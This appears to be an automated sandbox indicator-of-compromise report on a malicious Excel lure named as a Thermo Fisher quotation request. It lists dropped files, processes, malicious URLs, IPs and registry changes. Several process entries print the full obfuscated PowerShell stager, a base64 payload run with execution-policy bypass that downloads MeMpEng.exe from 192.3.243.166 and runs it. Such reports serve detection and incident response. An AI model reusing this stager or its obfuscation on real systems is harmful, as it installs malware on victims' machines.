IOC Report
Thermo Fisher RFQ_TFS-1805.xls

loading gif

Files

File Path
Type
Category
Malicious
Thermo Fisher RFQ_TFS-1805.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 03:58:51 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ideanetowroking[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\UserInfo.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsDialogs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsExec.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\LangDLL.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\UserInfo.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsDialogs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsExec.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\MeMpEng.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3688F29A.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A7ADD3.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B51D56E.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECB6B4E1.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
dropped
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RESA15F.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 05:01:23 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESF3D2.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 05:01:45 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\aoifm5vd.1c1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind
data
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Tilstandstabellers.inv
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Tracker.Cop38
data
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\freemanship.txt
ASCII text, with very long lines (304), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\pressurization.pra
data
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\restriktivitets.bnk
data
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\tresindstyvendedeles.ord
data
dropped
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh
data
dropped
C:\Users\user\AppData\Local\Temp\fyhnokoh.gcp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jomm5bhe.2yt.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
dropped
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\w1nxsl3a.4us.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF5C7CF45281D8AE11.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF660952C4B52B5A5E.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF8BC8A5344F5550C8.TMP
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 03:58:51 2024, Security: 1
dropped
C:\Users\user\AppData\Local\Temp\~DFBE6D8B1104A96767.TMP
data
dropped
There are 38 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"
malicious
C:\Users\user\AppData\Roaming\MeMpEng.exe
"C:\Users\user\AppData\Roaming\MeMpEng.exe"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
malicious
C:\Users\user\AppData\Roaming\MeMpEng.exe
"C:\Users\user\AppData\Roaming\MeMpEng.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP"
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.243.166/xampp/vcc/ideanetowroking.hta
192.3.243.166
malicious
http://192.3.243.166/340/MeMpEng.exe
192.3.243.166
malicious
http://192.3.243.166/xampp/vcc/ideanetowroking.htaA
unknown
http://ocsp.entrust.net03
unknown
https://zhort.de/Fi
unknown
https://contoso.com/License
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.hta...
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://zhort.de/6XcI3x
88.99.66.38
http://go.micros
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.hta$
unknown
http://192.3.243.166/340/MeMpEng.exesNMicro#z
unknown
https://zhort.de/.n
unknown
https://zhort.de/tr
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.243.166/340/MeMpEng.exesAM
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.hta7
unknown
https://zhort.de/6XcI3xi
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htaV.
unknown
http://192.3.243.166/340/MeMpEng
unknown
http://nuget.org/NuGet.exe
unknown
http://192.3.243.166/
unknown
http://crl.entrust.net/server1.crl0
unknown
https://zhort.de/6XcI3xQ
unknown
Http://192.3.243.166/xampp/vcc/ideanetowroking.htaA
unknown
https://contoso.com/Icon
unknown
http://192.3.243.166//
unknown
https://zhort.de/6XcI3xI
unknown
http://192.3.243.166/3
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://192.3.243.166/340/MeMpEng.exeU/
unknown
https://zhort.de/6XcI3xta
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htab
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htahttp://192.3.243.166/xampp/vcc/ideanetowroking.hta
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htase
unknown
Http://192.3.243.166/xampp/vcc/ideanetowroking.htaf
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htaings
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htaZ
unknown
https://zhort.de/60
unknown
http://192.3.243.166/xampp/vcc/ideanetowroking.htattC:
unknown
http://192.3.243.166/340/MeMpEng.exes
unknown
https://secure.comodo.com/CPS0
unknown
https://zhort.de/6XcI3xtalicyu
unknown
http://192.3.243.166/340/MeMpEng.exep
unknown
https://zhort.de/
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 41 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
zhort.de
88.99.66.38

IPs

IP
Domain
Country
Malicious
192.3.243.166
unknown
United States
malicious
88.99.66.38
zhort.de
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
`$0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28047
28047
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
5-0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31EC7
31EC7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32B83
32B83
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31EC7
31EC7
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\futurable\Macuca
Rigsdagsmandens
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 44 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
492A000
direct allocation
page execute and read and write
malicious
476000
heap
page read and write
10000
heap
page read and write
4745000
heap
page read and write
471C000
heap
page read and write
3429000
heap
page read and write
474000
heap
page read and write
1B354000
heap
page read and write
1AFAE000
stack
page read and write
4502000
heap
page read and write
3A15000
trusted library allocation
page read and write
439E000
heap
page read and write
1D00000
heap
page read and write
33BB000
heap
page read and write
3B4A000
trusted library allocation
page read and write
4505000
heap
page read and write
439C000
heap
page read and write
3DBF000
trusted library allocation
page read and write
7FE8B0D0000
trusted library allocation
page read and write
5F3000
heap
page read and write
4717000
heap
page read and write
1C2A9000
heap
page read and write
430000
heap
page read and write
2C30000
trusted library allocation
page read and write
321000
heap
page read and write
1C210000
heap
page read and write
313000
heap
page read and write
5159000
heap
page read and write
2E6E000
stack
page read and write
4D0000
heap
page read and write
4DF0000
heap
page read and write
461E000
stack
page read and write
1AAF6000
heap
page read and write
2360000
remote allocation
page read and write
2194000
heap
page read and write
2EF000
heap
page read and write
3C8A000
trusted library allocation
page read and write
5EF000
heap
page read and write
4589000
heap
page read and write
2D37000
trusted library allocation
page read and write
4A0000
heap
page read and write
20000
heap
page read and write
7FE8B380000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
408000
unkown
page readonly
7FE897DC000
trusted library allocation
page execute and read and write
34FD000
trusted library allocation
page read and write
270000
heap
page read and write
124000
heap
page read and write
100000
heap
page read and write
3530000
heap
page read and write
3C8A000
trusted library allocation
page read and write
729F1000
unkown
page execute read
1FA0000
direct allocation
page read and write
4520000
heap
page read and write
4596000
heap
page read and write
291000
heap
page read and write
308000
heap
page read and write
95C000
heap
page read and write
270000
trusted library allocation
page read and write
3635000
trusted library allocation
page read and write
19B000
direct allocation
page read and write
363F000
trusted library allocation
page read and write
33C3000
heap
page read and write
